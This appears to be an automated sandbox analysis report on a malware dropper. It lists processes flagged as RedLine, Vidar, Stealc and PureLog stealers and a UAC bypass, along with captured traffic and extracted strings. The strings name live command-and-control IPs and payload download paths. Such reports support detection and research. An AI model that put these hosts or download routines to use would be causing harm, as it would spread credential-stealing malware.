Apr 23, 2024 09:43:16.851830959 CEST	1289	IN	Data Raw: 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 30 e4 40 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 d0 41 40 00 01 00 03 53 72 63 02 00 00 9c 10 Data Ascii: StartIndex@Countb0@CopySelfA@Src@StartIndex'@Dest@Countb@CopySelf'@SrcA@Dest@StartIndex@Countb@Copy
Apr 23, 2024 09:43:16.851839066 CEST	1289	IN	Data Raw: 36 03 00 80 10 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 00 54 11 40 00 02 00 03 4f 66 73 02 00 02 00 43 00 d4 e8 40 00 09 52 65 61 64 49 6e 74 33 32 03 00 9c 10 40 00 08 00 03 00 00 00 00 00 Data Ascii: 6@Self'@PtrT@OfsC@ReadInt32@Self'@PtrT@OfsC@ReadInt64@Self'@PtrT@OfsA@ReadPtr'@Self'@PtrT@
Apr 23, 2024 09:43:16.851852894 CEST	1289	IN	Data Raw: 00 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 05 56 61 6c 75 65 02 00 02 00 3e 00 78 ea 40 00 11 41 6c 6c 6f 63 53 74 72 69 6e 67 41 73 41 6e 73 69 03 00 9c 27 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00 Data Ascii: SelfValue>x@AllocStringAsAnsi'@Self@StrP@AllocStringAsAnsi'@Self@Str@CodePageA@AllocStringAsUnicode'@Self@Str<l@A
Apr 23, 2024 09:43:17.052990913 CEST	1289	IN	Data Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 02 b8 12 40 00 02 00 05 56 61 6c 75 65 02 00 00 9c 10 40 00 0c 00 0f 4d 61 78 43 68 61 72 73 49 6e 63 4e 75 6c 6c 02 00 00 cc 10 40 00 08 00 08 43 6f 64 65 50 61 67 65 Data Ascii: Self'@Ptr@Value@MaxCharsIncNull@CodePages@WriteStringAsAnsiSelf'@PtrT@Ofs@Value@MaxCharsIncNull@WriteStringAsAnsiS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49705	20.157.87.45	80	648	C:\Users\user\AppData\Local\Temp\u48o.1.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 09:43:21.055814981 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 23, 2024 09:43:21.264677048 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6c 68 48 43 56 59 54 6e 41 79 6f 53 32 68 50 6b 39 49 54 55 43 51 66 46 76 61 45 49 51 2b 2f 6c 33 6e 69 78 46 78 62 4d 79 2b 36 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGlhHCVYTnAyoS2hPk9ITUCQfFvaEIQ+/l3nixFxbMy+62osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Apr 23, 2024 09:43:21.564630032 CEST	469	IN	HTTP/1.1 200 OK cache-control: private content-length: 256 content-type: text/html; charset=utf-8 x-whom: Ioloweb8 date: Tue, 23 Apr 2024 07:43:10 GMT set-cookie: SERVERID=svc8; path=/ connection: close Data Raw: 31 33 32 62 68 5a 33 4d 56 38 47 36 64 71 53 38 4c 68 46 6d 33 71 59 50 6f 4a 44 73 46 59 47 5a 70 75 54 32 2b 37 36 66 6f 6e 75 4b 30 71 57 64 75 67 30 6b 30 70 75 48 51 4a 2f 66 61 70 67 77 74 64 4f 58 51 72 79 6c 55 6c 2f 68 70 6c 34 34 77 75 67 69 4f 32 2f 4b 6d 7a 6f 53 4c 72 54 45 55 6f 48 62 4d 42 42 67 31 47 54 69 4e 4e 32 63 6d 75 6d 50 77 44 71 31 6d 6a 77 55 37 4e 53 74 5a 6b 6c 61 2b 58 79 47 77 54 6e 78 65 43 69 2b 4e 4d 45 63 47 70 31 32 65 33 6f 70 53 41 39 50 4a 46 62 53 5a 36 38 53 45 41 4c 54 76 7a 4f 7a 30 53 30 42 6a 6f 4c 65 42 30 6a 63 5a 36 45 54 63 6f 77 4e 31 2f 58 32 4b 70 7a 78 31 48 54 4c 69 70 4b 4b 76 30 54 52 58 32 6b 49 67 44 35 52 30 6c 4d 6b 61 4c 6b 6c 6d 7a 6c 6f 54 64 4c 47 7a 35 6c 79 45 65 4a 6e 66 79 53 76 79 4d 66 32 Data Ascii: 132bhZ3MV8G6dqS8LhFm3qYPoJDsFYGZpuT2+76fonuK0qWdug0k0puHQJ/fapgwtdOXQrylUl/hpl44wugiO2/KmzoSLrTEUoHbMBBg1GTiNN2cmumPwDq1mjwU7NStZkla+XyGwTnxeCi+NMEcGp12e3opSA9PJFbSZ68SEALTvzOz0S0BjoLeB0jcZ6ETcowN1/X2Kpzx1HTLipKKv0TRX2kIgD5R0lMkaLklmzloTdLGz5lyEeJnfySvyMf2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49724	20.157.87.45	80	648	C:\Users\user\AppData\Local\Temp\u48o.1.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 09:43:35.630181074 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 23, 2024 09:43:35.831243038 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6c 68 48 43 56 59 54 6e 41 79 6f 53 32 68 50 6b 39 49 54 55 43 51 74 69 53 56 57 6f 48 52 30 44 67 2b 47 4d 38 61 53 79 38 54 4c 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGlhHCVYTnAyoS2hPk9ITUCQtiSVWoHR0Dg+GM8aSy8TL2osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Apr 23, 2024 09:43:36.035351038 CEST	405	IN	HTTP/1.1 200 OK cache-control: private content-length: 192 content-type: text/html; charset=utf-8 x-whom: Ioloweb6 date: Tue, 23 Apr 2024 07:43:24 GMT set-cookie: SERVERID=svc6; path=/ connection: close Data Raw: 39 76 37 59 43 62 54 6a 68 53 4f 54 65 7a 71 52 74 42 41 38 44 61 46 35 46 43 52 49 72 4c 62 32 49 6c 78 6c 34 38 6a 4b 61 69 32 6d 65 6d 45 6e 73 33 69 48 76 54 35 4c 2b 48 33 43 49 6c 49 68 4f 6f 33 44 5a 35 33 6d 6c 6a 61 38 4b 42 32 59 45 49 73 2f 6a 31 50 54 39 36 78 49 73 73 61 66 69 37 62 44 69 4d 64 6b 2f 49 41 58 37 55 4a 75 55 59 31 35 61 38 31 67 4d 75 75 46 5a 4c 41 54 67 2b 42 39 62 35 69 4b 57 33 77 6f 49 4f 50 6c 6f 49 59 4a 45 65 78 30 33 62 6f 4c 51 68 4f 49 70 2b 4f 45 77 34 6a 52 4c 48 75 52 75 35 62 44 2b 34 61 49 49 42 63 42 43 43 69 6d 2b 6b 4e 53 Data Ascii: 9v7YCbTjhSOTezqRtBA8DaF5FCRIrLb2Ilxl48jKai2memEns3iHvT5L+H3CIlIhOo3DZ53mlja8KB2YEIs/j1PT96xIssafi7bDiMdk/IAX7UJuUY15a81gMuuFZLATg+B9b5iKW3woIOPloIYJEex03boLQhOIp+OEw4jRLHuRu5bD+4aIIBcBCCim+kNS

Target ID:	0
Start time:	09:43:07
Start date:	23/04/2024
Path:	C:\Users\user\Desktop\zLwT7vCojz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\zLwT7vCojz.exe"
Imagebase:	0x400000
File size:	485'377 bytes
MD5 hash:	577592F54BB4B19D416913B1816F7971
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1362288506.0000000006B8B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1558366239.00000000043AD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:43:11
Start date:	23/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\u48o.0.exe"
Imagebase:	0x400000
File size:	336'384 bytes
MD5 hash:	65A31455A497CAEE44C5AA749C50E40B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000A.00000002.1688142273.0000000004082000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.1687815536.000000000406C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 37%, ReversingLabs Detection: 42%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:43:15
Start date:	23/04/2024
Path:	C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\Qg_Appv5.exe"
Imagebase:	0x400000
File size:	8'538'160 bytes
MD5 hash:	54D53F5BDB925B3ED005A84B5492447F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 3%, ReversingLabs Detection: 3%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:43:18
Start date:	23/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u48o.1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\u48o.1.exe"
Imagebase:	0x400000
File size:	4'866'096 bytes
MD5 hash:	397926927BCA55BE4A77839B1C44DE6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000E.00000000.1354291806.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe, Author: Joe Security
Antivirus matches:	Detection: 4%, ReversingLabs Detection: 3%, Virustotal, Browse
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	09:43:20
Start date:	23/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 1476
Imagebase:	0x230000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	09:43:20
Start date:	23/04/2024
Path:	C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
Imagebase:	0x800000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	09:43:21
Start date:	23/04/2024
Path:	C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
Imagebase:	0x890000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	09:43:24
Start date:	23/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.1714070421.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.1714070421.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	09:43:24
Start date:	23/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	11:34:44
Start date:	23/04/2024
Path:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Imagebase:	0x256544c0000
File size:	59'721'128 bytes
MD5 hash:	8E9C467EAC35B35DA1F586014F29C330
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000000.1530072053.00000256544FB000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	11:34:55
Start date:	23/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x210000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.2498896890.00000000006CB000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.2522072387.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	11:34:57
Start date:	23/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 2020
Imagebase:	0x230000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	11:35:05
Start date:	23/04/2024
Path:	C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe"
Imagebase:	0x890000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.1802561648.0000000003DE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	11:35:06
Start date:	23/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.2051122015.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.2051122015.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.2050713251.00000000054D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	11:35:06
Start date:	23/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	11:35:27
Start date:	23/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0xd40000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	2.5%
Signature Coverage:	11.3%
Total number of Nodes:	1122
Total number of Limit Nodes:	15

Executed Functions

Function 00424B3E Relevance: 53.7, APIs: 1, Strings: 29, Instructions: 1213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00426354: __EH_prolog.LIBCMT ref: 00426359

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043CEE4), ref: 00424C05

Part of subcall function 00425EE2: __EH_prolog.LIBCMT ref: 00425EE7
Part of subcall function 00425EE2: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9

Strings

five, xrefs: 00424D3A, 00424D5C, 00424ED6
/1/Qg_Appv5.exe, xrefs: 00425997, 00425A3D, 00425A97
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 00424F10, 004250A6, 004250BD
Installed, xrefs: 00425357, 004253B5
note.padd.cn.com, xrefs: 004258C5, 0042597D, 00425A8E
seven, xrefs: 00424DAE, 00424DDC, 00424EE4
SOFTWARE\BroomCleaner, xrefs: 00425249, 0042533D
four, xrefs: 00424CFA, 00424D1C, 00424ECF
ten, xrefs: 00424E86, 00424E9C, 00424EF9
two, xrefs: 00424C7A, 00424C90, 00424EC1
nine, xrefs: 00424E46, 00424E68, 00424EF2
/BroomSetup.exe, xrefs: 00425C9E, 00425D44, 00425D92
P, xrefs: 00425635
/ping.php?substr=%s, xrefs: 004254C7, 0042559D, 004255B5
three, xrefs: 00424CAE, 00424CDC, 00424EC8
one, xrefs: 00424C44, 00424C5A, 00424EBE
/syncUpd.exe, xrefs: 00425737, 004257B9, 00425813
sub=([\w-]{1,255}), xrefs: 00424BD2
Qg_Appv5.exe, xrefs: 00425AEB, 00425B6D
P, xrefs: 0042581B
P, xrefs: 00425203
eight, xrefs: 00424DFA, 00424E28, 00424EEB
185.172.128.90, xrefs: 0042510B, 004251A5, 004251F3
P, xrefs: 00425A9F
six, xrefs: 00424D7A, 00424D90, 00424EDD
185.172.128.228, xrefs: 00425400, 004254A6, 00425625
185.172.128.228, xrefs: 00425BD8, 00425C84, 00425D89
185.172.128.59, xrefs: 0042567C, 00425716, 0042580A
P, xrefs: 00425D9A

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: /1/Qg_Appv5.exe$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$Qg_Appv5.exe$SOFTWARE\BroomCleaner$eight$five$four$nine$note.padd.cn.com$one$seven$six$sub=([\w-]{1,255})$ten$three$two
API String ID: 2531350358-4166474000
Opcode ID: ae36505b5daff832a18cd0001135b0aff67938ad5caa572e98a89e9e35783f3c
Instruction ID: b94a07167da01af8c51153bc4f1e8c174558d31be475b6648fa5fcd106bc986c
Opcode Fuzzy Hash: ae36505b5daff832a18cd0001135b0aff67938ad5caa572e98a89e9e35783f3c
Instruction Fuzzy Hash: A3A2211050A2E19AC712FB75589758A2FE51B6630DF54A87FE5D03F2A3C97C820C87AF

Uniqueness

Uniqueness Score: -1.00%

Function 00426504 Relevance: 50.1, APIs: 17, Strings: 11, Instructions: 1148
networkthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00426509
SetThreadLocale.KERNEL32(00000000,0043CF38,?,185.172.128.90,00000000), ref: 0042715F
WSAStartup.WS2_32(00000202,?), ref: 00427195
socket.WS2_32(00000002,00000001,00000006), ref: 004271AB
WSACleanup.WS2_32 ref: 004271C5
gethostbyname.WS2_32(00000000), ref: 004271D9
htons.WS2_32(?), ref: 0042720B
connect.WS2_32(00000000,?,00000010), ref: 0042721C
send.WS2_32(00000000,00000000,00000000,00000000), ref: 0042723F
send.WS2_32(00000000,00000000,?,00000000), ref: 0042725B
recv.WS2_32(00000000,00000000,00000001,00000000), ref: 0042729B
recv.WS2_32(?,00000000,00000001,00000000), ref: 00427419
recv.WS2_32(?,?,00000000,00000000), ref: 004274B8
recv.WS2_32(?,0000000A,00000002,00000000), ref: 004274DF
recv.WS2_32(00000000,?,?,00000000), ref: 00427540
WSACleanup.WS2_32 ref: 0042757E
closesocket.WS2_32(?), ref: 00427585

Strings

POST , xrefs: 0042683F, 0042686D
GET , xrefs: 0042688D, 004268AF, 004268C9
Transfer-Encoding, xrefs: 004266A3, 00426761, 0042737F
HTTP/1.1 200 OK, xrefs: 00426525, 004265D2, 004272E3
chunked, xrefs: 0042677F, 004267C5, 00427390
Content-Length, xrefs: 004265EB, 00426685, 00427343
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 , xrefs: 00426AB6, 00426D84
User-Agent: , xrefs: 00426A0B, 00426A8D
Host: , xrefs: 0042698A, 004269C4
185.172.128.90, xrefs: 00426515
HTTP/1.1, xrefs: 004268F6, 00426954

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: recv$Cleanupsend$H_prologLocaleStartupThreadclosesocketconnectgethostbynamehtonssocket
String ID: HTTP/1.1$185.172.128.90$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
API String ID: 1963173973-3676584321
Opcode ID: 51c48334816e60799d07e569962aedb61f2267285f835a8626d5efbc9b1ad91a
Instruction ID: 5d172c2dbe9bbe0c33395fe13eab479c6144de839071dc58773496d8017457fc
Opcode Fuzzy Hash: 51c48334816e60799d07e569962aedb61f2267285f835a8626d5efbc9b1ad91a
Instruction Fuzzy Hash: F092661090A2A19ACB02FFB5689649E7FF55A1630DB14747FE5907F3D3CA2C8209C76E

Uniqueness

Uniqueness Score: -1.00%

Function 004139E7 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
ExitProcess.KERNEL32 ref: 00413A21

Memory Dump Source

